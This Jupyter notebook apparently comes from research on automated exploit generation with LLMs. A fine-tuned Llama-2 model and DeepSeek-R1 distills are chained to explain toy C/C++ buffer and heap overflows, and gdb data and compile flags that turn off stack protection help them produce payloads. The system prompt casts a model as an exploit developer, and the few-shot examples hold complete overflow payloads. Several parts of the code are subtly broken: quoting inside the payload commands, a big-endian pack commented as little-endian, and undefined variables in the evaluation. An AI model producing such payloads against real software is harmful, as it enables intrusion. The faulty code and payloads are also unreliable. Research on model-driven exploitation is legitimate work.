# Chit Chat Pipeline

In [None]:
!pip install huggingface_hub datasets -q
!pip install -q accelerate peft trl bitsandbytes transformers

In [None]:
!sudo apt update -y && sudo apt install gdb build-essential -y
!gdb -version
!sudo apt install g++-multilib gcc-multilib -y

In [None]:
from huggingface_hub import login
dir_path = "/home/jovyan"

with open(f'{dir_path}/hf.txt', 'r') as file:
    hf_token = file.read()

    
login(token=hf_token)

In [None]:
import re
from huggingface_hub import notebook_login
from sys import argv

from datasets import load_dataset
import torch
from transformers import AutoModelForCausalLM, BitsAndBytesConfig, AutoTokenizer, TrainingArguments
from peft import LoraConfig
from trl import SFTTrainer
import gdb


from peft import AutoPeftModelForCausalLM

In [None]:
!pip install -q huggingface
from transformers import (
    AutoModelForCausalLM,
    pipeline,
)

In [None]:

#variabili gdb
nome_funzione_target = ""
distanza_var_f = {}
distanza_var_var = {}
val_distanza_var_f = {}
val_distanza_var_var = {}
indirizzo_f_target = ""
indirizzo_system = ""
indirizzo_binsh = ""
#fine variabili gdb


base_model_name = "MarioVar/llama2-7b-hf-finetuned-chitchat"

bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
    bnb_4bit_use_double_quant=True,
)

device_map = {"": 0}

tokenizer = AutoTokenizer.from_pretrained(base_model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token

model = AutoPeftModelForCausalLM.from_pretrained(base_model_name, device_map=device_map, torch_dtype=torch.bfloat16)

In [None]:
base_model_name_2 = "deepseek-ai/DeepSeek-R1-Distill-Llama-8B" 

PAD_TOKEN = "<|pad|>"
tokenizer_2 = AutoTokenizer.from_pretrained(base_model_name_2, use_fast=True)
tokenizer_2.add_special_tokens({"pad_token": PAD_TOKEN})
tokenizer_2.padding_side = "right"


bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
    bnb_4bit_use_double_quant=True,
)

model_2 = AutoModelForCausalLM.from_pretrained(base_model_name_2,
                                             quantization_config=bnb_config,
                                             device_map='auto')

In [None]:

pipe_model_2 = pipeline(
    task="text-generation",
    model=model_2,
    tokenizer=tokenizer_2,
    max_new_tokens=100000,
    return_full_text=False, # If set to False only added text is returned, otherwise the full text is returned. Cannot be specified at the same time as return_text.
)

In [None]:
import struct

def state_change(fase, output):
    if fase == 1:
        pattern = "explain to me"
        match = re.search(pattern, output.lower())
        if match:
            print(output)
            fase = 2
        else:
            print("Mi dispiace non ho ben capito cosa fare...\n")
    elif fase == 2:
        pattern = "what information"
        match = re.search(pattern, output.lower())
        if match:
            print(output)
            fase = 3
        else:
            print("Mi dispiace non ho ben capito cosa fare...\n")
    elif fase == 3:
        pattern = "assuming that"
        match = re.search(pattern, output.lower())
        if match:
            print(output)
            fase = 1
        else:
            print("Mi dispiace non ho ben capito cosa fare...\n")
    return fase
def estrazione_risultato(raw_result):
    sottostringa1 = "### Response:"
    sottostringa2 = "### End"
    parti_stringa = raw_result.split(sottostringa1)
    sottostringa1 = parti_stringa[1]
    parti_stringa = sottostringa1.split(sottostringa2)
    sottostringa1 = parti_stringa[0]
    return sottostringa1

#prelievo dell'input dall'utente

#preparazione dell'input per il modello
def preprocess_input(raw_input, fase):
    Prologue = "Below is an instruction that describes a Question Generation task\n"
    Instruction = "### Instruction: "
    Input = "### Input:\n"
    list = ""
    Response = "### Response:"
    if fase == 1:
        Instruction += "Request an explanation on how to perform the exploit of the following program\n"
    elif fase == 2:
        Instruction += "Ask what information is needed to proceed with the exploit\n"
    elif fase == 3:
        Input += "list:\n"
        nome_funzione_target, distanza_var_f, val_distanza_var_f, val_distanza_var_var, indirizzo_f_target, indirizzo_system, indirizzo_binsh, distanza_var_var = gdb.main(path_input_gdb, path_eseguibile)
        if indirizzo_f_target != "":
            # format little endian
            ind_f_target = struct.pack(">I", int(indirizzo_f_target, 16))
    
            # Formatta la stringa nel formato \xbb\xbb\xbb\xbb
            formatted_indirizzo_funzione_target = ''.join(f'\\x{byte:02x}' for byte in ind_f_target)
        if indirizzo_system != "":
            # format little endian
            ind_f_system = struct.pack(">I", int(indirizzo_system, 16))
    
            # Formatta la stringa nel formato \xbb\xbb\xbb\xbb
            formatted_indirizzo_funzione_system = ''.join(f'\\x{byte:02x}' for byte in ind_f_system)
        
        if distanza_var_f:
            for key in distanza_var_f.keys():
                list += "- offset between " + distanza_var_f[key]  + " and return address: " + str(val_distanza_var_f[key]) + " bytes" +  "\n"
        if nome_funzione_target != "":
            list += "- " + nome_funzione_target + "(): " + formatted_indirizzo_funzione_target + "\n"
        if indirizzo_system != "":
            list += "- system() address: " + formatted_indirizzo_funzione_system + "\n"
        if indirizzo_binsh != "":
            list += "- /bin/sh address: " + indirizzo_binsh + "\n"
        if distanza_var_var:
            for key in distanza_var_var.keys():
                list += "- offset between " + distanza_var_var[key][0] + " and " + distanza_var_var[key][1] + ": " + str(val_distanza_var_var[key]) + " bytes\n"
        Input += list + "\n"


                
        Instruction += "Below is provided a list of useful information and an explanation of the details needed to create an exploit for the vulnerable program. Analyze the explanation, use the provided list to gather the required information, and finally, request the generation of an input that exploits the vulnerability.\n"
    
    Input += raw_input + "\n"

    model_input = Prologue + Instruction + Input + Response
    #print (model_input)
    return model_input


def generate_reply(prompt):
    inputs = tokenizer(prompt, return_tensors="pt").to('cuda')
    # inputs = tokenizer(prompt, return_tensors="pt").to(device_map)
    outputs = model.generate(input_ids=inputs["input_ids"], attention_mask=inputs["attention_mask"], max_new_tokens=200, pad_token_id=tokenizer.eos_token_id)
    # outputs = model.generate(input_ids=inputs["input_ids"].to("cuda"), attention_mask=inputs["attention_mask"], max_new_tokens=200, pad_token_id=tokenizer.eos_token_id)
    raw_output = tokenizer.decode(outputs[0], skip_special_tokens=True)
    output = estrazione_risultato(raw_output)
    return output

def generate_reply_using_pipeline(prompt,pipeline_model1):
    output = pipeline_model1(prompt)[0]['generated_text']
    return output

def get_multiline_input():
    lines = []
    while True:
        line = input()
        if line.strip() == 'EOF':
            break
        lines.append(line)
    
    value_input = '\n'.join(lines)
    return value_input


#base_model.config.use_cache = False


def main():
    fase = 1
    
    print("Benvenuto nella conversazione.\n Digita 'exit' per terminare la conversazione quando lo desideri.\n Digita 'ricomincia' per iniziare una nuova conversazione di exploit.\n IMPORTANTE: Digita 'EOF' quando vuoi inviare un messaggio al modello ")
    while True:
        print(f"siamo nella fase {fase}\n")
        if(fase == 1):
            print("Inserisci un programma vulnerabile: \n")
        elif(fase == 2):
            print("User:\n")
        elif(fase == 3):
            print("User:\n")
        user_input = get_multiline_input()
        if user_input.lower() == 'exit':
            print("fine della conversazione! Ciao!")
            break
        if user_input.lower() == 'ricomincia':
            fase = 1
        else: 
            model_input = preprocess_input(user_input, fase)
            output = generate_reply(model_input)
            fase = state_change(fase, output)



In [None]:
from datasets import load_dataset

cpp_dataset = load_dataset("MarioVar/vulnerable-code_chitchat_doss1232")['train']
print(cpp_dataset)
cpp_dataset_dict = cpp_dataset.to_pandas()
cpp_dataset_dict.head()

In [None]:
import os
current_dir = os.path.dirname(os.path.abspath('.')) 


In [None]:
def get_system_prompt(phase):
    if phase == 1:
        return """Given the C/C++ program provided below, identify the vulnerability and explain how to exploit it in a series of clear, concise steps. Specifically, do the following:
Identify the Vulnerability Type: Determine if there is a buffer overflow in the code.
Explain the Exploit in Step-by-Step Process: Provide a concise list of steps an attacker would take to exploit the vulnerability (e.g., crafting input, triggering the overflow, gaining control).
Input Example: Provide an example of malicious input that triggers the vulnerability.
Focus on providing a succinct and clear explanation of the exploit process."""
    elif phase==2:
        return """Given the following C/C++ program, provide a concise, structured response with the following information:
Memory Address of Target Variable/Target Function: Explain how to find the address of the target variable relative to the buffer or the address of the target function to call.
Overflow Offset: Describe how to determine the number of bytes needed to overflow the buffer and reach the target variable or the return address on the stack.
Architecture type: The architecture is 32-bit or 64-bit (specify which one applies).
Endianness: Specify whether the system uses little-endian or big-endian."""
    else:
        return """
You are an expert in exploit development. Your task is to generate an attack payload in the format:  
`"<char>"*<offset> + <bytes>`  
where:  
- `<char>` is a filler character to overwrite memory until the target point.  
- `<offset>` is the number of filler characters needed.  
- `<bytes>` depends on the vulnerability type:  
  - **For buffer overflows**, `<bytes>` is the little-endian address of the target function to call.  
  - **For heap overflows**, `<bytes>` is a dummy value suitable for corrupting the target variable, which can be of any type.  

Think step by step:  
1. Determine the correct `<offset>` to reach the target memory location.  
2. Choose an appropriate `<char>` for padding.  
3. Format `<bytes>` correctly based on the vulnerability type. 
"""

def get_example_1(phase):
    if phase == 1:
        return ["""Explain to me how to exploit the following program:
#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[50];
    strcpy(buffer, input);  // Vulnerability: no bounds check, buffer overflow possible
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Passing user input to the vulnerable function
    }
    return 0;
}
""","""Vulnerability Type: Buffer Overflow (due to strcpy with no bounds checking).
Exploit Steps:
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s).
Step 2: Pass this input as a command-line argument to the program.
Step 3: The input overwrites the buffer and potentially the return address on the stack.
Step 4: The attacker can place a malicious address or shellcode in the overflowed space, redirecting the program's execution.
Input Example:
./vulnerable_program $(python -c "print('A' * 51)")
"""]
    elif phase==2:
        return ["""Given this code:
#include <stdio.h>
#include <string.h>
void secret_function() {
    // Apre il file in modalità append
    std::ofstream outfile("log_call.txt", std::ios_base::app); // `std::ios_base::app` è per aggiungere al file

    if (outfile.is_open()) {
        outfile << "well done!" << std::endl;
        outfile.close();
    } else {
        std::cerr << "Impossibile aprire il file per la scrittura!" << std::endl;
    }
}

void vulnerable_function(char *input) {
    char buffer[50];
    strcpy(buffer, input);  // Vulnerability: no bounds check, buffer overflow possible
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Passing user input to the vulnerable function
    }
    return 0;
}
Exploit Steps:
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s).
Step 2: Pass this input as a command-line argument to the program.
Step 3: The input overwrites the buffer and potentially the return address on the stack.
Step 4: The attacker can place a malicious address or shellcode in the overflowed space, redirecting the program's execution.
Input Example:
./vulnerable_program $(python -c "print('A' * 51)")
What information do you need in order to overflows the buffer and change the value of the return address?
""","""
To exploit the provided code:
Memory Address of Target Variable/Target Function: Use gdb to inspect the stack and find the address of the secret_function.
Overflow Offset: Use gdb to find the number of bytes needed to reach the return address or target variable (e.g., by inspecting the stack layout after overflowing the buffer).
Architecture Type: Check with gdb or file to determine if the architecture is 32-bit or 64-bit.
Endianness: Confirm with gdb or check the system documentation. Typically, x86 and x86_64 architectures are little-endian.
"""]
    else:
        return [r"""
Given this code
#include <stdio.h>
#include <string.h>
void secret_function() {
    // Apre il file in modalità append
    std::ofstream outfile("log_call.txt", std::ios_base::app); // `std::ios_base::app` è per aggiungere al file

    if (outfile.is_open()) {
        outfile << "well done!" << std::endl;
        outfile.close();
    } else {
        std::cerr << "Impossibile aprire il file per la scrittura!" << std::endl;
    }
}

void vulnerable_function(char *input) {
    char buffer[50];
    strcpy(buffer, input);  // Vulnerability: no bounds check, buffer overflow possible
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Passing user input to the vulnerable function
    }
    return 0;
}
Assuming that:
- System architecture target is x86 32 bit little endian
- ASLR mechanism is disable
- Stack canaries mechanism is disable
- The offset between 'buffer' and 'return address' is 54 bytes
- The address of 'secret_function()' function is \xe2\x2e\x55\x55
Create an input that exploits the vulnerability in order to execute the 'secret_function()'
""",r"""
This is a stack-based buffer overflow, meaning our goal is to hijack execution flow by overwriting the return address to execute a chosen function.
Here is the exploit payload that will overwrite the return address and execute secret_function():
Step 1. Determine the offset (offset = 54)
The return address is 54 bytes after the buffer, so we need 54 padding characters to reach it.
Step 2. Choose the filler character (char)
We use "A" (\x41 in hex) as the filler.
Step 3. Determine the byte data to overwrite the target memory area (bytes = "\xe2\x2e\x55\x55")
The address of `secret_function()` is given as `\xe2\x2e\x55\x55`.
Since the system is **x86 32-bit little-endian**, the address needs to be converted to little-endian format. The little-endian representation of `\xe2\x2e\x55\x55` is `\x55\x55\x2e\xe2`
Step 4: Final Payload
```bash
./vulnerable_program $(python -c "print("A" * 54 + b"\x55\x55\x2e\xe2")")
```
This injects 54 "A" characters followed by the overwritten return address.
When executed, the program will jump to secret_function() instead of returning normally.
"""]

def get_example_2(phase):
    if phase == 1:
        return ["""Explain to me how to exploit the following program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(50 * sizeof(char));  // Allocate 50 bytes on the heap
    int secret = 12345;  // Variable to be overwritten
    if (buffer == NULL) {
        printf("Memory allocation failed\n");
        return;
    }
    strcpy(buffer, input);  // Vulnerability: No bounds check, heap overflow possible

    printf("Secret before overflow: %d\n", secret);
    printf("Input: %s\n", buffer);

    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Pass user input to the vulnerable function
    }
    return 0;
}
""","""Vulnerability Type: Heap Overflow (due to strcpy with no bounds checking). 
Exploit Steps: 
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s followed by "B"s). 
Step 2: Pass this input as a command-line argument to the program. 
Step 3: The input overflows the heap buffer and can overwrite the adjacent secret variable. 
Step 4: The attacker can change the secret variable’s value by crafting the input appropriately. 
Input Example:
./vulnerable_program $(python -c "print('A' * 51 + 'B' * 4)")
"""]
    elif phase==2:
        return ["""Given this code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(50 * sizeof(char));  // Allocate 50 bytes on the heap
    int secret = 12345;  // Variable to be overwritten
    if (buffer == NULL) {
        printf("Memory allocation failed\n");
        return;
    }
    strcpy(buffer, input);  // Vulnerability: No bounds check, heap overflow possible

    printf("Secret before overflow: %d\n", secret);
    printf("Input: %s\n", buffer);

    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Pass user input to the vulnerable function
    }
    return 0;
}
Exploit Steps: 
Step 1: Craft an input longer than 50 characters (e.g., a string of "A"s followed by "B"s). 
Step 2: Pass this input as a command-line argument to the program. 
Step 3: The input overflows the heap buffer and can overwrite the adjacent secret variable. 
Step 4: The attacker can change the secret variable’s value by crafting the input appropriately. 
Input Example:
./vulnerable_program $(python -c "print('A' * 51 + 'B' * 4)")
What information do you need in order to overflows the buffer and change the value of the secret variable?
""","""To exploit the provided code:
Memory Address of Target Variable/Target Function:  Use `gdb` to find the address of `secret` relative to the buffer.
Overflow Offset: Use `gdb` to determine how many additional bytes are needed to reach `secret`.
Architecture Type: Check with gdb or file to determine if the architecture is 32-bit or 64-bit.
Endianness: Confirm with gdb or check the system documentation. Typically, x86 and x86_64 architectures are little-endian.
"""]
    else:
        return [r"""Given this code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(50 * sizeof(char));  // Allocate 50 bytes on the heap
    int secret = 12345;  // Variable to be overwritten
    if (buffer == NULL) {
        printf("Memory allocation failed\n");
        return;
    }
    strcpy(buffer, input);  // Vulnerability: No bounds check, heap overflow possible

    printf("Secret before overflow: %d\n", secret);
    printf("Input: %s\n", buffer);

    free(buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1) {
        vulnerable_function(argv[1]);  // Pass user input to the vulnerable function
    }
    return 0;
}       
Assuming that:
- System architecture target is x86 32 bit little endian
- ASLR mechanism is disable
- Stack canaries mechanism is disable
- The offset between the 'buffer' array  and the variable 'secret' is 50 bytes
Create an input that exploits the vulnerability in order to modify the value of the variable 'secret' to a non-zero value.      
""",r"""This is a heap-based overflow affecting a stack variable, meaning our goal is to modify secret instead of hijacking execution flow.
Here is the exploit payload that will overwrite the target variable:
1. Determine the correct `<offset>` to reach the target memory location (offset = 50): 
The vulnerable buffer is allocated with 50 bytes on the heap (malloc(50)).
The secret variable is immediately after the buffer in memory.
To reach and overwrite secret, we need to write exactly 50 bytes to fill the buffer.
2. Choose an appropriate `<char>` for padding (char = "A"): 
We use "A" (\x41 in hex) as the padding character to fill the buffer until we reach secret.
3. Format `<bytes>` correctly based on the vulnerability type (bytes = "\xef\xbe\xad\xde");
The secret variable is an integer (int), meaning it occupies 4 bytes.
We want to overwrite secret with a nonzero value, so we choose 0xdeadbeef. 
Step 5: Final Payload
```bash
./vulnerable_program $(python -c "print("A" * 50 + b"\xef\xbe\xad\xde")")
```
This injects 50 "A" characters to overflow buffer, followed by our chosen integer value.
When printed, secret will be changed from 12345 to \xef\xbe\xad\xde.
"""]


In [None]:
def create_test_prompt(phase: int,model_a_prompt: str,model_b_prev_output=None): 
    example_1 = get_example_1(phase)
    example_2 = get_example_2(phase)
    messages = [{"role": "system","content": f"{get_system_prompt(phase)}"},
    {"role": "user", "content": example_1[0]},
    {"role": "assistant", "content":example_1[1]},
    {"role": "user", "content":example_2[0]},
    {"role": "assistant", "content":example_2[1]},
    {"role": "user", "content":f"""{model_b_prev_output}
{model_a_prompt}
"""}]
    return tokenizer_2.apply_chat_template(messages, tokenize=False,add_generation_prompt=True)

In [None]:
print(create_test_prompt(1,"<HERE_THE_CODE>",None))

In [None]:
print(create_test_prompt(2,"\n\n\t<HERE_THE_CODE>\n\n","\n\n\t<HERE_THE_PHASE_1_MODELB_RESPONSE>\n\n"))

In [None]:
print(create_test_prompt(3,"\n\n\t<HERE_THE_CODE>\n\n","\n\n\t<HERE_THE_PHASE_1_MODELB_RESPONSE>\n\n"))

## In House Pipeline

In [None]:
import signal
import json
from tqdm import tqdm
import time
TIMEOUT_SECONDS = 300
class TimeoutException(Exception):
    pass
def timeout_handler(signum, frame):
    raise TimeoutException("The operation timed out.")



def call_model_1(model_input,retry_limit = 5):
    for i in range(0,retry_limit):
        try:
            signal.signal(signal.SIGALRM, timeout_handler)
            signal.alarm(TIMEOUT_SECONDS)  # Set the timeout
            out = generate_reply(model_input)
            signal.alarm(0)  # Cancel the alarm if the operation completes
            return out
        except TimeoutException:
            print(f"\033[31m[Model 1 Task ~ {i+1} of {retry_limit}] ~ Timeout occurred. Retrying...\033[0m")
        finally:
            signal.alarm(0)  # Ensure the alarm is always canceled    

    

def call_model_2(prompt,retry_limit = 5):
    for i in range(0,retry_limit):
        try:
            signal.signal(signal.SIGALRM, timeout_handler)
            signal.alarm(TIMEOUT_SECONDS)  # Set the timeout
            out = pipe_model_2(prompt)[0]['generated_text']
            signal.alarm(0)  # Cancel the alarm if the operation completes
            return out
        except TimeoutException:
            print(f"\033[32m[Model 2 Task ~ {i+1} of {retry_limit}] ~ Timeout occurred. Retrying...\033[0m")
        finally:
            signal.alarm(0)  # Ensure the alarm is always canceled


runLocalModel=True # set false if you want to execute phase3 of Model B using groq
init = True
path_input_gdb=None
path_eseguibile=None
valid_filenames = []
for i in tqdm(range(0,len(cpp_dataset)), desc="Processing Files", unit="file"):
    data = cpp_dataset[i]
    in_phase_processing=True
    output = ""
    # output_model2 = ""
    while in_phase_processing:
        try: 
            if init==True:
                init=False
                fase=1
            print(f"Preparing processing: phase {fase} on element having index {i}")
            
            if data['input_gdb_path'] is not None:
                print(f"Running phase {fase} on element having index {i}")

                cpp_name = data['file_path'].split('/')[-1].replace('.', '_')
                path_input_gdb = f"./vuln_code/input_gdb_{cpp_name}.txt"
                input_cpp_path = "./vuln_code/program.cpp"
                path_eseguibile = "./vuln_code/compiled/program"
    
                with open("./vuln_code/program.cpp","w") as f:
                    f.write(data['code'])

                with open(path_input_gdb,"w") as f:
                    f.write(data['input_gdb_content'])
                
                !g++ -m32 -g -O0 -fno-stack-protector -z execstack -o "./vuln_code/compiled/program" "./vuln_code/program.cpp" "./vuln_code/flag_func.cpp"
                

                
                model_input = preprocess_input(data['code'], fase) #il primo parametro non è usato, quindi lascio fisso code
                output = call_model_1(model_input)


                with open(f'./phase_outputs/model_a/{cpp_name}_{fase}.txt', 'w') as f:
                        f.write(output)
                if fase==3:
                    with open(f'./phase_outputs/model_a/{cpp_name}.txt', 'w') as f:
                        f.write(output)

                if fase==1:
                    model_2_output=''

                elif fase==2:
                    model_2_output="Given the code:\n"+data['code']+"\n"+model_2_output
                else:
                    model_2_output="Given the code:\n"+data['code']+"\n"
                
                model_2_prompt = create_test_prompt(fase,output,model_2_output)
                with open(f'./phase_outputs/model_b/prompt/{cpp_name}_{fase}.txt', 'w') as f:
                        f.write(model_2_prompt)                                
                print(f"\033[33m{model_2_prompt}\033[0m")


        
                model_2_output = call_model_2(model_2_prompt)
                model_2_output = model_2_output.split('</think>')[-1]
                with open(f'./phase_outputs/model_b/{cpp_name}_{fase}.txt', 'w') as f:
                        f.write(model_2_output)
                        
        
                    # output_model2 += f"fase: {fase}\nmodel_output:\n{model_2_output}"        



                
                if fase == 3:
                    # with open(f'selected_samples_rerun/{cpp_name}.txt', 'w') as f:
                    #     f.write(output_model2)

                    print("Fase 3 reached, analyzing next code")
                    #exit the while
                    init=True
                    in_phase_processing=False
                    valid_filenames.append(f'{cpp_name}.txt')
                else:
                    fase = state_change(fase, output)

            else: # input gdb none => skip this element
                print(f"No inputGdbFile found for the element having having index {i}.")
                init=True
                in_phase_processing=False
                with open(f"./phase_outputs/logs/{cpp_name}_elementindex{i}","w") as f:           
                    f.write(f"Skipped {e}.\n\t file_name: {cpp_name}\n\tIndex for cpp dataset:{i}\n\t reason: No Gdb for this file.")
        except Exception as e:
            print(e)
            init=True
            in_phase_processing=False
            with open(f"./phase_outputs/logs/{cpp_name}_elementindex{i}","w") as f:           
                f.write(f"Error {e}.\n\t file_name: {cpp_name}\n\tIndex for cpp dataset:{i}\n\tFase:{fase}")

with open('valid_filed_processed.json','w') as f:
    json.dump(valid_filenames,f)


## In house pipeline evaluation

In [None]:

def format_little_endian(hex_address):
    # Rimuove '0x' se presente e assicura che sia lungo 8 caratteri (4 byte)
    hex_address = hex_address.replace('0x', '').zfill(8)  
    # Divide in byte da 2 caratteri e inverte per little-endian
    little_endian = '\\x' + '\\x'.join(reversed([hex_address[i:i+2] for i in range(0, 8, 2)]))
    return little_endian


In [None]:
import re

def extract_info(text):
    # Trova l'offset
    offset_match = re.search(r"The offset between .* and the return address is (\d+) bytes", text)
    offset = int(offset_match.group(1)) if offset_match else None

    # Trova l'indirizzo della funzione
    addr_match = re.search(r".*((?:\\x[0-9a-fA-F]{2}){4})", text)
    if addr_match:
        # Estrai i byte direttamente con regex
        raw_bytes = re.findall(r"\\x([0-9a-fA-F]{2})", addr_match.group(0))
        # Converte in little endian
        little_endian_address = ''.join(f'\\x{byte}' for byte in raw_bytes[::-1])
    else:
        little_endian_address = None

    return offset, little_endian_address




In [None]:
def extract_offset_and_address(payload):
    offset = None  # Evita UnboundLocalError
    
    # Trova il pattern del padding ('A' o 'B' ripetuti) e conta il numero di ripetizioni
    pattern_repeat = re.compile(r'(?:.*print.*["\']([A-Za-z])["\']\s*\*\s*(\d+)|.*print.*["\']([A-Za-z].*)(?:\\x[0-9a-fA-F]{2}){4})')
    payload = payload.replace('./vulnerable_program','')
    match_repeat = pattern_repeat.findall(payload)

    for groups in match_repeat:
      # print(groups)
      if groups[1]:  # Caso "A" * 22
          offset = int(groups[1])
      elif groups[2]:  # Caso diretto come "AAAAAAAAA"
          offset = len(groups[2])

    # Trova l'indirizzo in formato byte (\xHH)
    addr_match = re.search(r"(?:\\x[0-9a-fA-F]{2}){4}", payload)
    if addr_match:
      address = addr_match.group(0)
    else:
      address = None

    return offset, address

In [None]:
import re
skipped_elements = {'invalid_dummy_char':0,
                    'invalid_generated_return_address':0,
                    'return_address_or_offset_different_from_expected':0,
                    'ground_truth_return_address_or_offset_not_found':0,
                    'invalid_offset':0,
                    'invalid_model_b_response':0,
                    'from_exception':0
                   }
valid_elements=[]
import os
current_path = os.getcwd()
pattern = re.compile(r'^file_(\d{1,10})_cpp_3\.txt$')
tresh = 100
total_elements = 0
processed_elements_of_cpp_dataset = []

#Subset of samples which will be used to rerun the chitchat using CoT and FewShot in context learning
subset=[]

for file in os.listdir('./phase_outputs/model_b'):
    filematch = pattern.match(file)

    if not filematch:
        continue  
    total_elements+=1
    index = int(filematch.group(1))  # estrae indice dataset
    processed_elements_of_cpp_dataset.append(index)
    # print(f"File: {file}, Indice numerico: {index}")
    if os.path.isfile(f'./phase_outputs/model_b/{file}') and os.path.isfile(f'./phase_outputs/model_a/{file}'):
        with open(f"./phase_outputs/model_b/{file}",'r') as f:
            model_b_output = f.read()
        with open(f"./phase_outputs/model_a/{file}",'r') as f:
            model_a_output = f.read()
        try:
            
    
            pattern2 = re.compile(r"```bash\s*\n(.*?)\n\s*```", re.DOTALL)
            
            match = pattern2.search(model_b_output)
            if match:
                code = match.group(1)
                p_offset,p_ret_address = extract_offset_and_address(code)
    
                if p_offset and p_ret_address:
    
                    if offset<tresh:
                        true_offset, true_match_address = extract_info(model_a_output)
                        if true_match_address and true_offset:
                            if true_match_address == p_ret_address and p_offset == true_offset:
                                print(f"\n[Dataset Index {index}] \033[33mValid\033[0m Payload: A * {p_offset} + {p_ret_address}\n")
                                valid_elements.append(f'"A" * {p_offset} + {p_ret_address}')
                            else:
    #                             print(f"""\n[Dataset Index {index}] Invalid Payload:
    # Return Address Generated\tReturn Address Expected
    # {p_ret_address}\t{true_match_address}""")
                                skipped_elements['return_address_or_offset_different_from_expected']+=1
                                subset.append(index)
                                continue
    
                        else:
                            # print(f"[Dataset Index {index}] No Ground Truth return address found in ModelA response: {model_a_output}")
                            skipped_elements['ground_truth_return_address_or_offset_not_found']+=1
                            subset.append(index)
                            continue
    
                    else:
                        # print(f"\n[Dataset Index {index}] Invalid Payload: Offset calculated is too big: offset={p_offset}\n")
                        skipped_elements['invalid_offset']+=1
                        continue
    
    
            else:
    #             print(f"""\n[Dataset Index {index}] Invalid Payload: output from response model, doesn't match the expected format
    # expected format:
    # ```bash
    # ...
    # ```
    # Model B Response:
    # {model_b_output}
    # """)
                skipped_elements['invalid_model_b_response']+=1
                subset.append(index)
                continue
    
        except Exception as e:
            print(f'raised exception in model response parsing: {e} - index {index}')
            skipped_elements['from_exception']+=1
        
    

In [None]:
print(f"valid payloads: {len(valid_elements)}/{len(cpp_dataset)} ({len(valid_elements)/len(cpp_dataset)*100:.2f}%)")


In [None]:
import matplotlib.pyplot as plt


# Extract keys and values
labels = list(skipped_elements.keys())
values = list(skipped_elements.values())

# Plot
plt.figure(figsize=(10, 5))
plt.bar(labels, values, color='skyblue')

# Labels and title
plt.xlabel('Skip Reasons', fontsize=12)
plt.ylabel('Count', fontsize=12)
plt.title('Skipped Elements Histogram', fontsize=14)
plt.xticks(rotation=45, ha="right")  # Rotate labels for better readability
plt.grid(axis='y', linestyle='--', alpha=0.7)

print(f"Total Skipped elements: {sum(values)}/{total_elements}")
# Show plot
plt.show()


## running using groq llama70b (only model B phase 3)

In [None]:
!pip install groq

In [None]:
files = set()
import os
for file in os.listdir('./phase_outputs/model_a'):
  if 'cpp' in file:
    base_filename = f"{file.split('cpp')[0]}cpp_"
    files.add(base_filename)
len(files)

In [None]:
valid_files = []
invalid_files = []
import os.path
for file in list(files):
  filename_3 = f'{file}3.txt'
  if os.path.isfile(f'./phase_outputs/model_a/{filename_3}'):
    with open(f'./phase_outputs/model_a/{filename_3}','r') as f:
      model_a_prompt = f.read()
    offset,little_endian_address = extract_info(model_a_prompt)
    if offset!=None and little_endian_address!=None:
      valid_files.append(file)
    else:
      invalid_files.append({
          'offset':offset,
          'address':little_endian_address,
          'full_text':model_a_prompt
      })

In [None]:


from groq import Groq
def run_model(phase: int,model_a_prompt: str,model_b_prev_output=None):

    client = Groq(
        api_key=api_key,
    )
    example_1 = get_example_1(phase)
    example_2 = get_example_2(phase)
    chat_completion = client.chat.completions.create(
        messages=[{"role": "system","content": f"{get_system_prompt(phase)}"},
        {"role": "user", "content": example_1[0]},
        {"role": "assistant", "content":example_1[1]},
        {"role": "user", "content":example_2[0]},
        {"role": "assistant", "content":example_2[1]},
        {"role": "user", "content":f"""{model_b_prev_output}
    {model_a_prompt}
    """}],
        model="deepseek-r1-distill-llama-70b",
    )

    return chat_completion.choices[0].message.content
    
      

In [None]:
import os
import requests
api_key_list = [


]
def switch_key(list):
  if len(list):
    return list.pop()
  else:
    return ""

In [None]:
import re
def parse_output(response):
  pattern2 = re.compile(r"```bash\n(.*?)\n```", re.DOTALL)
  match = pattern2.search(response)
  if match:
    code = match.group(1)
    return code
  else:
    return ""

In [None]:
from tqdm import tqdm  
llama70_responses = []
exec_time = []
response=None
import time
api_key=switch_key(api_key_list)
for file in tqdm(list(valid_files)):
  if api_key!="":
    print(f"Parsing {file}\n")
    filename_1 = f'{file}1.txt'
    filename_3 = f'{file}3.txt'
    with open(f'./phase_outputs/model_a/{filename_1}','r') as f:
      file_prompt = f.read()
      if 'program' in file_prompt:
        model_b_prev = file_prompt.replace('Explain to me how to exploit the following program:',"Given the code:") 
      else:
        model_b_prev = file_prompt.replace('Explain to me how to exploit the following:',"Given the code:") 

    with open(f'./phase_outputs/model_a/{filename_3}','r') as f:
      model_a_prompt = f.read()
      
      while response==None and api_key!="":
        try:
          start_time = time.time()  # Tempo di inizio inferenza
          response = run_model(3,model_a_prompt,model_b_prev)
          end_time = time.time()    # Tempo di fine inferenza
        except Exception as e:
              end_time = time.time()    # Tempo di fine inferenza
              print(e)
              if('429 ' in str(e)):
                print("Hitted Rate Limit")
                api_key = switch_key(api_key_list)
              elif(end_time-start_time)<60:
                time.sleep(60-end_time-start_time)
              else:
                break

      inference_time = end_time - start_time
